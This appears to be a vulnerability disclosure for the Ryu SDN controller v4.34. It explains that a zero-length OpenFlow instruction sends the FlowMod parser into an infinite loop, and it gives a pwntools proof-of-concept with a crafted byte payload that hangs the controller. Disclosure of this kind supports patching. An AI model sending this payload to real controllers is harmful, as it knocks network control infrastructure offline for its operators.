in /ryu/ofproto/ofproto_v1_3_parser.py about line=1050
class OFPFlowMod(MsgBase):
....
while offset < msg_len:
i = OFPInstruction.parser(buf, offset)
instructions.append(i)
offset += i.len
msg.instructions = instructions
If OFPInstruction.len=0 , the offset will no longer change and the parsing will fall into an infinite loop.
Execute the controller through the following command:
ryu-manager
poc:
from pwn import *
p=remote("0.0.0.0",6633)
payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()
Executing the POC will cause the controller to fall into an infinite loop and no longer work.
This problem also occurs with the following code:
/ryu/ofproto/ofproto_v1_3_parser.py about line=1050
/ryu/ofproto/ofproto_v1_4_parser.py about line=4453
/ryu/ofproto/ofproto_v1_3_parser.py about line=5321
They will affect OpenFlow1.3, OpenFlow1.4, OpenFlow1.5.
Affected versions: v4.34